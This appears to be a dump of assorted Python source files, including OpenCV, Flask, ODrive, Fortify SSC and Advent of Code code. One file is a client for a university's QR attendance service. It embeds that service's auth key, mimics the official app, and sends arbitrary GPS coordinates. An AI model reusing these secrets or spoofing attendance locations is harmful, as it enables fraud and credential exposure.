id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
1653533 | <filename>analyze/match.py
import sys
import matplotlib.pyplot as plt
import cv2 as cv
import numpy as np
# Compare the shapes found in two grayscale images with cv.matchShapes and
# plot the thresholded images with their approximated contours.
# Usage: python match.py <image1> <image2>
fig, axes = plt.subplots(nrows=2, ncols=3, figsize=(9.3, 6), sharex=True, sharey=True)
fig.subplots_adjust(left=0.03, right=0.97, hspace=0.3, wspace=0.05)
ax = axes.ravel()  # flatten the 2x3 axes grid so panels can be indexed 0..5
for a in ax.ravel():
    a.axis('off')
    a.set_aspect('equal')
# load test data
if len(sys.argv) > 2:
    img1 = cv.imread(sys.argv[1], cv.IMREAD_GRAYSCALE)
    # Heavy blur applied only to the first image before thresholding.
    img1 = cv.GaussianBlur(img1,(31,31),0)
    img2 = cv.imread(sys.argv[2], cv.IMREAD_GRAYSCALE)
    # Top row: the two input images, titled with their file names.
    ax[0].imshow(img1, cmap=plt.cm.get_cmap(name="cividis"))
    ax[0].set_title(sys.argv[1], fontdict={'fontsize': 11})
    ax[1].imshow(img2, cmap=plt.cm.get_cmap(name="cividis"))
    ax[1].set_title(sys.argv[2], fontdict={'fontsize': 11})
    # Morphological close (fill small holes), then binarize at mid-gray.
    kernel = np.ones((9, 9), np.uint8)
    ret, thresh = cv.threshold(cv.morphologyEx(img1, cv.MORPH_CLOSE, kernel), 127, 255, cv.THRESH_BINARY)
    ret, thresh2 = cv.threshold(cv.morphologyEx(img2, cv.MORPH_CLOSE, kernel), 127, 255, cv.THRESH_BINARY)
    # thresh1 = cv.morphologyEx(thresh, cv.MORPH_CLOSE, kernel)
    # thresh2 = cv.morphologyEx(thresh2, cv.MORPH_CLOSE, kernel)
    # NOTE(review): the 3-value unpacking matches the OpenCV 3.x findContours
    # signature; OpenCV 4 returns only (contours, hierarchy) -- confirm the
    # pinned OpenCV version.
    image, contours, hierarchy = cv.findContours(thresh, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
    cnt1 = contours[0]  # only the first external contour of each image is compared
    epsilon = 0.001*cv.arcLength(cnt1, False)  # approximation tolerance: 0.1% of arc length
    cnt1 = cv.approxPolyDP(cnt1, epsilon, False)
    image, contours, hierarchy = cv.findContours(thresh2, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
    cnt2 = contours[0]
    epsilon = 0.001*cv.arcLength(cnt2, False)
    cnt2 = cv.approxPolyDP(cnt2, epsilon, False)
    # matchShapes returns a distance (0 for identical shapes per OpenCV docs),
    # so 1-ret is printed as a similarity score.
    ret = cv.matchShapes(cnt1,cnt2,1,0.0)
    print("Similarity={:.2f}".format(1-ret))
    # Bottom row: binarized images with the approximated contour drawn on top.
    poly1 = cnt1.reshape(-1,2)
    ax[3].imshow(thresh, cmap=plt.cm.get_cmap(name="cividis"))
    ax[3].plot(poly1[:, 0], poly1[:, 1], linewidth=4)
    poly2 = cnt2.reshape(-1,2)
    ax[4].imshow(thresh2, cmap=plt.cm.get_cmap(name="cividis"))
    ax[4].plot(poly2[:, 0], poly2[:, 1], linewidth=4)
    plt.show()
| StarcoderdataPython |
3220496 | <gh_stars>0
#!/usr/bin/env python3
# coding: utf-8
import argparse
import os.path
from torch.autograd import Variable
import torch.onnx
import sys
import os
import os.path as osp
sys.path.append(osp.dirname(osp.dirname(osp.abspath(__file__))))
from models.resnet50_unet_activation import UNetWithResnet50Encoder
from models.resnet50_unet_activation_DUA import UNetWithResnet50EncoderDUA
from models.resnet50_unet_activation_bilinear import UNetWithResnet50EncoderBi
from models.resnet50_unet_activation_drop import UNetWithResnet50Encoder_act_drop
from models.resnet50_unet_activation_no_bn import UNetWithResnet50Encoder_act_no_bn
from collections import OrderedDict
def fix_model_state_dict(state_dict):
    """Strip the DataParallel ``module.`` prefix from checkpoint keys.

    Takes a checkpoint dict containing a ``'model_state'`` entry and returns
    an OrderedDict with the same weights whose keys can be loaded into a
    model that is not wrapped in ``torch.nn.DataParallel``.
    """
    fixed = OrderedDict()
    for key, weight in state_dict['model_state'].items():
        if key.startswith('module.'):
            key = key[len('module.'):]  # drop the DataParallel wrapper prefix
        fixed[key] = weight
    return fixed
if __name__ == "__main__":
    # Export a trained UNet/ResNet50 checkpoint to ONNX, written next to the
    # .pth file with the same basename.
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('--trained_model', '-tm', type=str, help='trained model',
                        default='./checkpoints/glare_bestmodel_35_11_train_37_28.pth')
    parser.add_argument('--width', type=int, help='feature map width', default=3584)
    parser.add_argument('--height', type=int, help='feature map height', default=2560)
    parser.add_argument('--channel', type=int, help='feature map channel', default=3)
    args = parser.parse_args()
    model = UNetWithResnet50Encoder(n_classes=args.channel)
    # load it
    state_dict = torch.load(args.trained_model)
    model.load_state_dict(fix_model_state_dict(state_dict))
    # Dummy input used to trace the graph for export.
    # NOTE(review): this is built as (1, channel, width, height); the torch
    # convention is NCHW (batch, channel, height, width), so width/height look
    # swapped here -- confirm against the model's training input size.
    x = Variable(torch.randn(1, args.channel, args.width, args.height))
    input_names_ = ["data"]
    output_names_ = ["pred"]
    torch.onnx.export(model, x, os.path.splitext(
        args.trained_model)[0] + '.onnx', verbose=True, input_names=input_names_, output_names=output_names_)
| StarcoderdataPython |
1647124 | <filename>posda/posdatools/python/posda/main/__init__.py
import sys
import json
import os
import subprocess
from ..util import md5sum
from ..util import printe
from .file import insert_file
def get_parameters():
    """Read all of stdin and decode it as a single JSON document."""
    raw = sys.stdin.read()
    return json.loads(raw)
def get_stdin_input():
    """Return every line of stdin, stripped of surrounding whitespace."""
    return [line.strip() for line in sys.stdin]
#TODO: move these classes somewhere else... maybe posda.compat?
# They aren't going to be used much, if at all.
class DicomFile:
    """A DICOM file parsed via the external ./dicom_dump.sh helper.

    Elements can be looked up by tag string ("(0010,0010)"), by their
    human-readable description, or by a (group, element) integer tuple.
    """

    def __init__(self, filename):
        self.filename = filename
        self.__parse(filename)

    def __getitem__(self, index):
        if isinstance(index, tuple):
            group, element = index
            return self.get_by_tag("({0:04x},{1:04x})".format(group, element))
        if isinstance(index, str):
            # does it look like a "(gggg,eeee)" tag?
            looks_like_tag = (index.startswith("(")
                              and index.endswith(")")
                              and "," in index)
            if looks_like_tag:
                return self.get_by_tag(index)
            return self.get_by_name(index)
        raise RuntimeError("Not sure how to locate tag using a " +
                           str(type(index)))

    def get_by_tag(self, tag):
        """Return the element with the given "(gggg,eeee)" tag string."""
        return DicomTag(self.by_tag[tag])

    def get_by_name(self, name):
        """Return the element with the given human-readable description."""
        return DicomTag(self.by_desc[name])

    def __parse(self, filename):
        """Run dicom_dump.sh and index its colon-separated output lines."""
        self.stat = os.stat(filename)
        self.md5sum = md5sum(filename)
        dump = subprocess.run(['./dicom_dump.sh', filename],
                              stdout=subprocess.PIPE)
        by_tag = {}
        by_desc = {}
        for line in dump.stdout.decode().split('\n'):
            try:
                tag, vr, desc, *rest = line.split(':')
            except:  # lines without at least three colons are not elements
                continue
            record = (tag, vr, desc, ':'.join(rest))
            by_tag[tag] = record
            by_desc[desc] = record
        self.by_tag = by_tag
        self.by_desc = by_desc
class DicomTag:
    """One parsed DICOM element: tag id, VR, human-readable name and value."""

    def __init__(self, init_tuple):
        # init_tuple is (tag, vr, description, raw_value) as built by DicomFile.
        self.tag_name, self.vr, self.name, self._value = init_tuple
        self._init_value()

    def _init_value(self):
        """Normalize the raw text: strip surrounding quotes, split multi-values."""
        raw = self._value
        # TODO: hacky -- a value that legitimately contains surrounding quotes
        # would be mangled here.
        if raw.startswith('"') and raw.endswith('"'):
            raw = raw[1:-1]
        if "\\" in raw:
            # DICOM multi-valued elements use backslash as the separator.
            raw = raw.split("\\")
        self.value = raw

    def __repr__(self):
        return f"<DicomTag: {self.name} = {self.value}>"

    def __str__(self):
        return str(self.value)

    def __unicode__(self):
        return str(self.value)
| StarcoderdataPython |
9617112 | <filename>interfearence_hardware/src/interfearence_hardware/odrive_interface.py
import odrive
from odrive.enums import *
from odrive.utils import dump_errors
import time
class OdriveInterface:
    """Wrapper around a single ODrive board driving two wheel motors.

    Construction blocks until the board is found and both axes finish a
    full calibration sequence; it raises RuntimeError if calibration fails.
    """

    def __init__(self, ):
        # CONSTANTS
        self.MIN_MOTOR_RADS = 104 # So min wheel speed is ~50 RPM
        self.MAX_MOTOR_RADS = 471 # So max wheel speed is ~200 RPM
        self.MAX_EFFORT = 20
        # Encoder counts per radian the MOTOR has turned
        self.ENCODER_COUNTS_PER_RAD = 4000 / (2 * 3.1415926)
        # Encoder counts from the wheels
        self._encoder_counts = [0, 0]
        # Find the Odrive - block until received
        print("\033[1;31mWaiting for Odrive...\033[0m")
        self._odrv = odrive.find_any()
        print("\033[1;32m...Found Odrive\033[0m")
        # Do initial callibration
        self._odrv.axis0.requested_state = AXIS_STATE_FULL_CALIBRATION_SEQUENCE
        self._odrv.axis1.requested_state = AXIS_STATE_FULL_CALIBRATION_SEQUENCE
        # NOTE(review): this loop exits as soon as EITHER axis reaches IDLE
        # (the condition is an `and`); waiting for both axes would require
        # `or`. Confirm whether that is intended.
        while (self._odrv.axis0.current_state != AXIS_STATE_IDLE and
               self._odrv.axis1.current_state != AXIS_STATE_IDLE):
            time.sleep(0.1)
        if self._odrv.axis0.error != 0x00 or self._odrv.axis1.error != 0x00:
            dump_errors(self._odrv, True)
            raise RuntimeError("Failed to calibrate axis")
        # Set ourselves to the reset state
        self.reset();
        # Ensure that we're in velocity control
        self._odrv.axis0.controller.config.control_mode = CTRL_MODE_VELOCITY_CONTROL
        self._odrv.axis1.controller.config.control_mode = CTRL_MODE_VELOCITY_CONTROL
        # Cached per-axis control mode so we only write config on changes.
        self._ctrl_modes = [CTRL_MODE_VELOCITY_CONTROL,
                            CTRL_MODE_VELOCITY_CONTROL]

    # Set reset state, where motors are un-powered
    def reset(self):
        """Idle both axes, zero the velocity setpoints and clear errors."""
        self._odrv.axis0.requested_state = AXIS_STATE_IDLE
        self._odrv.axis1.requested_state = AXIS_STATE_IDLE
        self._odrv.axis0.controller.vel_setpoint = 0
        self._odrv.axis1.controller.vel_setpoint = 0
        self.clear_errors()

    # Release the odrive from reset, powering on the motors
    def release_reset(self):
        """Zero the encoder counts and enter closed-loop control on both axes."""
        # Prepare for new match
        self._odrv.axis0.encoder.shadow_count = 0
        self._odrv.axis1.encoder.shadow_count = 0
        self._odrv.axis0.requested_state = AXIS_STATE_CLOSED_LOOP_CONTROL
        self._odrv.axis1.requested_state = AXIS_STATE_CLOSED_LOOP_CONTROL

    # Read the wheel velocity in radians per second
    def get_wheel_vel(self, axis, dt):
        """Estimate wheel velocity (rad/s) for `axis` from the encoder delta
        over the last `dt` seconds."""
        old_encoder_counts = self._encoder_counts[axis]
        if axis == 0:
            self._encoder_counts[axis] = self._odrv.axis0.encoder.shadow_count
        else:
            self._encoder_counts[axis] = self._odrv.axis1.encoder.shadow_count
        delta = self._encoder_counts[axis] - old_encoder_counts
        # The factor of 20 converts motor radians to wheel radians; it matches
        # the `vel *= 20` in set_wheel_vel -- presumably a 20:1 reduction.
        wheel_vel = delta / (dt * self.ENCODER_COUNTS_PER_RAD * 20)
        return wheel_vel

    # Set the wheel velocity in radians per second
    def set_wheel_vel(self, axis, vel):
        """Command a wheel velocity (rad/s) on `axis`, clamped to the motor's
        allowed speed band; switches the axis to velocity control if needed."""
        # Convert wheel velocity into motor velocity
        vel *= 20
        # NOTE(review): anything below MIN_MOTOR_RADS -- including all negative
        # (reverse) commands -- is clamped to 0; confirm reverse driving is
        # handled elsewhere.
        if vel < self.MIN_MOTOR_RADS:
            vel = 0
        elif vel > self.MAX_MOTOR_RADS:
            vel = self.MAX_MOTOR_RADS
        if self._ctrl_modes[axis] != CTRL_MODE_VELOCITY_CONTROL:
            self._ctrl_modes[axis] = CTRL_MODE_VELOCITY_CONTROL
            if axis == 0:
                self._odrv.axis0.controller.config.control_mode = CTRL_MODE_VELOCITY_CONTROL
            else:
                self._odrv.axis1.controller.config.control_mode = CTRL_MODE_VELOCITY_CONTROL
        if axis == 0:
            self._odrv.axis0.controller.vel_setpoint = vel * self.ENCODER_COUNTS_PER_RAD
        else:
            self._odrv.axis1.controller.vel_setpoint = vel * self.ENCODER_COUNTS_PER_RAD

    # Read the battery voltage
    def get_battery_voltage(self):
        """Return the DC bus voltage reported by the ODrive."""
        return self._odrv.vbus_voltage

    # Set the effort(current) applied to the wheel
    def set_wheel_eff(self, axis, eff):
        """Command a motor current on `axis`, clamped to +/-MAX_EFFORT;
        switches the axis to current control if needed."""
        if eff > self.MAX_EFFORT:
            eff = self.MAX_EFFORT
        elif eff < -self.MAX_EFFORT:
            eff = -self.MAX_EFFORT
        if self._ctrl_modes[axis] != CTRL_MODE_CURRENT_CONTROL:
            self._ctrl_modes[axis] = CTRL_MODE_CURRENT_CONTROL
            if axis == 0:
                self._odrv.axis0.controller.config.control_mode = CTRL_MODE_CURRENT_CONTROL
            else:
                self._odrv.axis1.controller.config.control_mode = CTRL_MODE_CURRENT_CONTROL
        if axis == 0:
            self._odrv.axis0.controller.current_setpoint = eff
        else:
            self._odrv.axis1.controller.current_setpoint = eff

    # Read the effort(current) applied to the wheel
    def get_wheel_eff(self, axis):
        """Return the larger-magnitude measured phase current (B or C) on `axis`."""
        B = 0
        C = 0
        if axis == 0:
            B = self._odrv.axis0.motor.current_meas_phB
            C = self._odrv.axis0.motor.current_meas_phC
        else:
            B = self._odrv.axis1.motor.current_meas_phB
            C = self._odrv.axis1.motor.current_meas_phC
        if abs(B) > abs(C):
            return B
        return C

    def check_errors(self):
        """Return True if either axis reports a non-zero error code."""
        if self._odrv.axis0.error != 0x00:
            return True
        if self._odrv.axis1.error != 0x00:
            return True
        return False

    def clear_errors(self):
        """Print and clear any pending ODrive errors."""
        dump_errors(self._odrv, True)
| StarcoderdataPython |
1829857 | <reponame>zmaktouf/restsim
from flask import Flask, request, make_response, jsonify
from functools import wraps
import os
import json
app = Flask(__name__)
# In-memory caches: endpoint payload documents and expected query-arg documents.
g_data_cache={}
g_data_args_cache={}
# Cache-type selectors for _get_data().
DATA_CACHE = 1
ARGS_CACHE = 2
def _get_data(path, cachetype=DATA_CACHE):
    """Load (and memoize) the JSON payload or expected-args document for a path.

    Reads data/<path>.json for DATA_CACHE or data/<path>.args.json for
    ARGS_CACHE, caching the parsed document.  Returns {} on any failure
    (missing file, bad JSON).  Python 2 code (print statement).
    """
    global g_data_cache
    global g_data_args_cache
    cache = g_data_cache if cachetype==DATA_CACHE else g_data_args_cache
    ext = ".json" if cachetype==DATA_CACHE else ".args.json"
    try:
        if path not in cache:
            source="data/"+path+ext
            print "Loading ressource ", source
            with open(source, 'r') as fd :
                cache[path]=json.load(fd)
        return cache[path]
    except:
        return {}
def _validate_params(args, path):
    """Return True if the request's query args exactly match the expected
    <path>.args.json document.  Python 2 only: relies on the builtin cmp()."""
    expected = _get_data(path, ARGS_CACHE)
    result = cmp(args,expected)==0
    print "_validate_params returns ", result
    if not result:
        print "expected: ", expected
        print "received: ", args
    return result
def _check_auth(username, password):
return username == 'admin' and password == '<PASSWORD>'
def _authenticate():
    """Build the 401 challenge response asking the client for Basic credentials."""
    body = ('Could not verify your access level for that URL.\n'
            'You have to login with proper credentials')
    challenge = {'WWW-Authenticate': 'Basic realm="Login Required"'}
    return make_response(body, 401, challenge)
def requires_auth(f):
    """Decorator that enforces HTTP Basic auth on a Flask view function."""
    @wraps(f)
    def decorated(*args, **kwargs):
        creds = request.authorization
        if not creds or not _check_auth(creds.username, creds.password):
            # Missing or bad credentials: reply with the 401 challenge.
            return _authenticate()
        return f(*args, **kwargs)
    return decorated
@app.route("/<path:path>", methods=['GET'])
@requires_auth
def endpoint_ressource(path):
    """Serve the canned JSON document for any GET path, provided the query
    args match the recorded expectation; otherwise return a 404 with an
    error payload.  Python 2 code (print statement)."""
    print path
    response = None
    valid = _validate_params(request.args.to_dict(), path)
    if valid:
        payload=_get_data(path)
        if payload:
            response = make_response(json.dumps(payload), 200)
            response.headers['Content-Type'] = 'application/json'
            return response
    # Either the args were wrong or no payload file exists for this path.
    response = make_response(jsonify({"errorCode": 4001, "errorMessage": "Ressource not found" if valid else "Invalid parameters"}), 404)
    response.headers['Content-Type'] = 'application/json'
    return response
if __name__ == "__main__":
    # Randomize the session secret at startup (sessions won't survive restarts).
    app.secret_key = os.urandom(12)
app.run(debug=True, host='0.0.0.0', port=4000) | StarcoderdataPython |
9786126 | """Some useful tools."""
from ..errors import AsinNotFoundException
import re
def get_asin(text: str) -> str:
    """Extract an Amazon ASIN from *text*.

    *text* may be a bare ASIN (exactly ten uppercase letters/digits) or an
    Amazon product URL.  Raises AsinNotFoundException when nothing matches.
    """
    # A bare ASIN: ten uppercase alphanumerics and nothing else.
    if re.search(r'^[A-Z0-9]{10}$', text):
        return text
    # Otherwise look for the 10-character id following a known URL path segment.
    match = re.search(r'(dp|gp/product|gp/aw/d|dp/product)/([a-zA-Z0-9]{10})', text)
    if match is None:
        raise AsinNotFoundException('Asin not found: ' + text)
    return match.group(2)
| StarcoderdataPython |
8004458 |
def clean_groups(filename='day6.txt'):
    """Read an Advent of Code day-6 input file and return one string per group.

    Each returned string is the group's lines joined with leading spaces
    (e.g. ' ab cd '), which is the format the counting helpers expect.
    *filename* defaults to 'day6.txt' for backward compatibility.

    Fixes over the original: the file is closed via ``with``; each line is
    stripped of its trailing newline instead of unconditionally losing its
    last character (which corrupted a final line without a newline); and the
    final group is no longer dropped when the file does not end in a blank
    line.
    """
    groups = []
    group = ''
    with open(filename, 'r') as f:
        for line in f:
            answers = line.rstrip('\n')
            group += ' ' + answers
            if answers == '':
                # Blank line terminates the current group.
                groups.append(group)
                group = ''
    if group:  # flush the trailing group when there is no blank line at EOF
        groups.append(group)
    return groups
def count_uinique_answers_part1(groups):
    """Sum, over all groups, the number of distinct answers in each group.

    Each element of *groups* is a space-joined string of everyone's answers.
    """
    total = 0
    for group in groups:
        distinct = set(group.replace(' ', ''))
        total += len(distinct)
    return total
def count_uinique_answers_part2(groups):
    """Sum, over all groups, the number of questions every member answered."""
    return sum(find_duplicates(group.split()) for group in groups)
def find_duplicates(group):
    """Return how many answers appear in every member of *group*.

    *group* is a list of per-person answer strings; the result is the size
    of the intersection of the members' answer sets (AoC 2020 day 6 part 2).

    Fixes over the original: the single-member branch returned
    ``len(list(group[0]))`` and therefore double-counted duplicate letters
    within one person's answers, and an empty group raised IndexError.
    """
    if not group:
        return 0  # no people -> no common answers
    common = set(group[0])
    for answers in group[1:]:
        common &= set(answers)
    return len(common)
# Script entry: parse day6.txt from the working directory and print the
# answers to both parts of the puzzle.
groups = clean_groups()
total1 = count_uinique_answers_part1(groups)
total2 = count_uinique_answers_part2(groups)
print(f'Part 1: {total1}')
print(f'Part 2: {total2}')
| StarcoderdataPython |
11237894 | <filename>tests/tests/models/test_file.py
import os
from app.models import FileExample
from paper_uploads.models import UploadedFile
from ..dummy import *
from .test_dummy import (
TestFileFieldResource,
TestFileFieldResourceAttach,
TestFileFieldResourceDelete,
TestFileFieldResourceEmpty,
TestFileFieldResourceRename,
)
class TestUploadedFile(TestFileFieldResource):
    """Integration tests for UploadedFile backed by the NATURE_FILEPATH fixture."""

    # Expected storage layout and fixture metadata used by inherited tests.
    resource_url = '/media/files/%Y-%m-%d'
    resource_location = 'files/%Y-%m-%d'
    resource_name = 'Nature Tree'
    resource_extension = 'Jpeg'
    resource_size = 672759
    resource_checksum = 'e3a7f0318daaa395af0b84c1bca249cbfd46b9994b0aceb07f74332de4b061e1'
    # Owner model wiring: app.FileExample.file
    owner_app_label = 'app'
    owner_model_name = 'fileexample'
    owner_fieldname = 'file'
    owner_class = FileExample
    file_field_name = 'file'

    @classmethod
    def init_class(cls, storage):
        # Fixture generator: create and attach the resource, yield to the
        # tests, then remove both the file and the database row.
        storage.resource = UploadedFile(
            owner_app_label=cls.owner_app_label,
            owner_model_name=cls.owner_model_name,
            owner_fieldname=cls.owner_fieldname
        )
        with open(NATURE_FILEPATH, 'rb') as fp:
            storage.resource.attach_file(fp)
        storage.resource.save()
        yield
        storage.resource.delete_file()
        storage.resource.delete()

    def test_get_file_folder(self, storage):
        assert storage.resource.get_file_folder() == self.resource_location

    def test_display_name(self, storage):
        assert storage.resource.display_name == self.resource_name

    def test_as_dict(self, storage):
        # The serialized form exposed by the resource's as_dict().
        assert storage.resource.as_dict() == {
            'id': 1,
            'name': self.resource_name,
            'extension': self.resource_extension,
            'size': self.resource_size,
            'file_info': '(Jpeg, 672.8\xa0KB)',
            'url': storage.resource.get_file_url(),
            'created': storage.resource.created_at.isoformat(),
            'modified': storage.resource.modified_at.isoformat(),
            'uploaded': storage.resource.uploaded_at.isoformat(),
        }
class TestUploadedFileAttach(TestFileFieldResourceAttach):
    """Attach-behaviour tests; inherits all cases, only pins the resource class."""
    resource_class = UploadedFile
class TestUploadedFileRename(TestFileFieldResourceRename):
    """Rename tests: attach as old_name.jpg, then rename to new_name.png."""
    resource_class = UploadedFile
    resource_location = 'files/%Y-%m-%d'
    owner_app_label = 'app'
    owner_model_name = 'fileexample'
    owner_fieldname = 'file'

    @classmethod
    def init_class(cls, storage):
        # Create the resource and remember the pre-rename file name/path so
        # the inherited tests can compare old vs. new.
        storage.resource = cls.resource_class(
            owner_app_label=cls.owner_app_label,
            owner_model_name=cls.owner_model_name,
            owner_fieldname=cls.owner_fieldname
        )
        with open(NATURE_FILEPATH, 'rb') as fp:
            storage.resource.attach_file(fp, name='old_name.jpg')
        storage.resource.save()
        file = storage.resource.get_file()
        storage.old_source_name = file.name
        storage.old_source_path = file.path
        storage.resource.rename_file('new_name.png')
        yield
        # The rename leaves the old file on disk; remove it explicitly.
        os.remove(storage.old_source_path)
        storage.resource.delete_file()
        storage.resource.delete()
class TestUploadedFileDelete(TestFileFieldResourceDelete):
    """Delete tests: the file is removed during setup, before the tests run."""
    resource_class = UploadedFile
    resource_location = 'files/%Y-%m-%d'
    owner_app_label = 'app'
    owner_model_name = 'fileexample'
    owner_fieldname = 'file'

    @classmethod
    def init_class(cls, storage):
        # Attach a file, remember its name/path, then delete the file so the
        # inherited tests can check post-delete behaviour.
        storage.resource = cls.resource_class(
            owner_app_label=cls.owner_app_label,
            owner_model_name=cls.owner_model_name,
            owner_fieldname=cls.owner_fieldname
        )
        with open(NATURE_FILEPATH, 'rb') as fp:
            storage.resource.attach_file(fp, name='old_name.jpg')
        storage.resource.save()
        file = storage.resource.get_file()
        storage.old_source_name = file.name
        storage.old_source_path = file.path
        storage.resource.delete_file()
        yield
        storage.resource.delete()
class TestUploadedFileEmpty(TestFileFieldResourceEmpty):
    """Empty-resource tests for UploadedFile.

    Fixes a typo: the attribute was misspelled ``recource_class``, so the
    intended override was never seen by the base class (every sibling test
    class here spells it ``resource_class``).
    """
    resource_class = UploadedFile
class TestUploadedFileExists:
    """Checks that delete_file() actually removes the file from storage."""

    @staticmethod
    def init_class(storage):
        # Fixture generator: attach a file; teardown tolerates the file
        # having already been deleted by the test itself.
        storage.resource = UploadedFile(
            owner_app_label='app',
            owner_model_name='fileexample',
            owner_fieldname='file'
        )
        with open(NATURE_FILEPATH, 'rb') as fp:
            storage.resource.attach_file(fp)
        storage.resource.save()
        yield
        try:
            storage.resource.delete_file()
        except ValueError:
            # File already deleted by the test body.
            pass
        storage.resource.delete()

    def test_files(self, storage):
        source_path = storage.resource.path
        assert os.path.exists(source_path) is True
        storage.resource.delete_file()
        assert os.path.exists(source_path) is False
| StarcoderdataPython |
5114481 | import base64
import random
import string
import requests
class SimasterQrPresence:
    """Client for UGM SIMASTER's QR-code presence (attendance) service.

    Wraps login, device registration, presence-token retrieval and QR scan
    submission over HTTPS using a persistent requests.Session.
    """

    # Fixed client credential for the presensiqr endpoints (sent as Basic auth).
    BASIC_AUTH_KEY = 'integrasiPresensiQR:serv1CEintegrasi-Pre$en$iGHQR'
    SIMASTER_URL = 'https://simaster.ugm.ac.id'
    LOGIN_URL = f'{SIMASTER_URL}/services/simaster/service_login'
    COMMIT_DEVICE_URL = f'{SIMASTER_URL}/services/simaster/commit_device'
    QRP_TOKEN_REQUEST_URL = f'{SIMASTER_URL}/services/presensiqr/request_token'
    QRP_SCAN_URL = f'{SIMASTER_URL}/services/presensiqr/doscanent'
    QRP_AUTH_HEADER = {
        'Authorization': f'Basic {base64.b64encode(BASIC_AUTH_KEY.encode()).decode()}'}
    # Default headers on every request; the User-Agent mimics the mobile app.
    HEADERS = {
        'UGMFWSERVICE': '1',
        'User-Agent': 'Praesentia/1.0.0'
    }

    def __init__(self, a_id=None):
        # a_id: 16-hex-char device identifier; a random one is generated if omitted.
        self.a_id = a_id if a_id else self._generate_random_a_id()
        self.logged_in = False
        self.session_id = None
        self.account_data = {}
        self.session = requests.Session()
        self.session.headers.update(self.HEADERS)

    def login(self, username, password):
        """Authenticate, cache session/account info and register this device.

        Returns True on success, False when either the login request or the
        device commit fails.
        """
        req = self.session.post(self.LOGIN_URL, data={
            'aId': self.a_id,
            'username': username,
            'password': password,
        })
        if req.status_code != 200:
            return False
        self.logged_in = True
        data = req.json()
        self.session_id = data['sesId']
        self.group_id = data['groupMenu']
        self.account_data['name'] = data['namaLengkap']
        self.account_data['group'] = data['groupMenuNama']
        self.account_data['id'] = data['userTipeNomor']
        return self._commit_device()

    def send_qr_presence(self, qr_data, lat, long):
        """Submit a scanned QR code with GPS coordinates.

        Returns (status, heading, message) from the server, or None when a
        presence token could not be obtained.
        """
        token = self._request_token()
        if not token:
            return None
        data = self.session.post(self.QRP_SCAN_URL, headers={**self.QRP_AUTH_HEADER},
                                 data={
                                     token['token']: token['value'],
                                     'device': self.session_id,
                                     'group': self.group_id,
                                     'code': qr_data,
                                     'latitudeGps': lat,
                                     'longitudeGps': long,
                                 }).json()
        return data['status'], data['heading'], data['message']

    def _commit_device(self):
        """Register the current session's device id; True on HTTP 200."""
        if not self.logged_in:
            return False
        req = self.session.post(self.COMMIT_DEVICE_URL, data={
            'sesId': self.session_id
        })
        return req.status_code == 200

    def _request_token(self):
        """Fetch a one-time presence token; {} when not logged in or on error."""
        if not self.logged_in:
            return {}
        req = self.session.get(self.QRP_TOKEN_REQUEST_URL, headers={
            **self.QRP_AUTH_HEADER
        })
        if not req.status_code == 200:
            return {}
        return req.json()

    @staticmethod
    def _generate_random_a_id():
        """Return a random 16-character lowercase hex device identifier."""
        return ''.join(random.choice(string.hexdigits) for _ in range(16)).lower()
| StarcoderdataPython |
1762986 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import datetime
from SSCClient.core import SSCClient
from SSCClient.utils import func_extract_all_project_names
from collections import defaultdict
if __name__ == "__main__":
    # Report scan results for every Fortify SSC project version as CSV on
    # stdout, then post-process each version.
    ssc_client = SSCClient("https://192.168.1.1/ssc")
    # ssc_client.set_auth_token("<KEY>")
    ssc_client.set_auth_cookie("E58BC67EEB87A6BAFE32778A2C9CB395")
    project_version_mapping = ssc_client.func_get_project_version_dict()
    id_list = []
    print("project,version,critical,high,medium,low,noOfFiles, totalLOC,execLOC,elapsedTime,lastScanData")
    for project_info, version_list in project_version_mapping.items():
        for version_info in version_list:
            version_id = version_info.id
            id_list.append(version_id)
            # Fetch issue counts (scan results), including suppressed and hidden issues.
            r = ssc_client.func_get_issue_count_by_id(version_id=version_id, showsuppressed="true", showhidden="true")
            if len(r) == 0:
                # No results: emit an empty CSV row for this version.
                print("{},{},,,,,,,,,".format(project_info.name, version_info.name))
                continue
            scan_result = defaultdict(int)
            for _ in r:
                scan_result[_['id']] = _['totalCount']
            # Fetch execution info for the most recent scan artifact, skipping
            # artifacts that contain no scan entry.
            start = 0
            while True:
                r = ssc_client.func_get_artifact_info(version_id, start)
                if r[0]['_embed']['scans'][0] is None:
                    start += 1
                    continue
                noOfFiles = r[0]['_embed']['scans'][0]['noOfFiles']
                totalLOC = r[0]['_embed']['scans'][0]['totalLOC']
                execLOC = r[0]['_embed']['scans'][0]['execLOC']
                elapsedTime = r[0]['_embed']['scans'][0]['elapsedTime']
                # elapsedTime arrives as "MM:SS" or "HH:MM:SS".
                tmp = elapsedTime.split(':')
                if len(tmp) == 2:
                    elapsedTime = datetime.timedelta(minutes=float(elapsedTime.split(':')[0]), seconds=float(elapsedTime.split(':')[1]))
                if len(tmp) == 3:
                    elapsedTime = datetime.timedelta(hours=float(elapsedTime.split(':')[0]), minutes=float(elapsedTime.split(':')[1]), seconds=float(elapsedTime.split(':')[2]))
                lastScanData = r[0]['lastScanDate']
                # Drop the fractional-seconds suffix before parsing.
                lastScanData = datetime.datetime.strptime(lastScanData.split('.')[0], "%Y-%m-%dT%H:%M:%S")
                print("{},{},{},{},{},{},".format(project_info.name, version_info.name, scan_result['Critical'], scan_result['High'],scan_result['Medium'], scan_result['Low']),end='')
                print("{},{},{},{},{}".format(noOfFiles, totalLOC, execLOC, elapsedTime.total_seconds(), lastScanData))
                break
    # Grant the user access to each project version.
    # NOTE(review): the loop below actually suppresses Low-severity issues;
    # the access-grant call is commented out -- confirm which was intended.
    username = "firstname2"
    for version_id in id_list:
        ssc_client.func_suppress_all_issues_by_folder(2, "Low")
# ssc_client.func_add_ladpuser_to_projectverion_by_user_name(version_id, username) | StarcoderdataPython |
4987581 | import pandas
import random
import collections
# Gender codes used throughout this module.
MALE = 0
FEMALE = 1

# This life table nominally comes from
# https://www.kitces.com/joint-life-expectancy-and-mortality-calculator/
# but on closer inspection its numbers do not match the 2004 Period Life
# Table it appears to be based on (e.g. it gives a 90-year-old male a death
# probability of .181789 versus the actual .155383), so the real source is
# unknown.  In general its numbers are more grim.
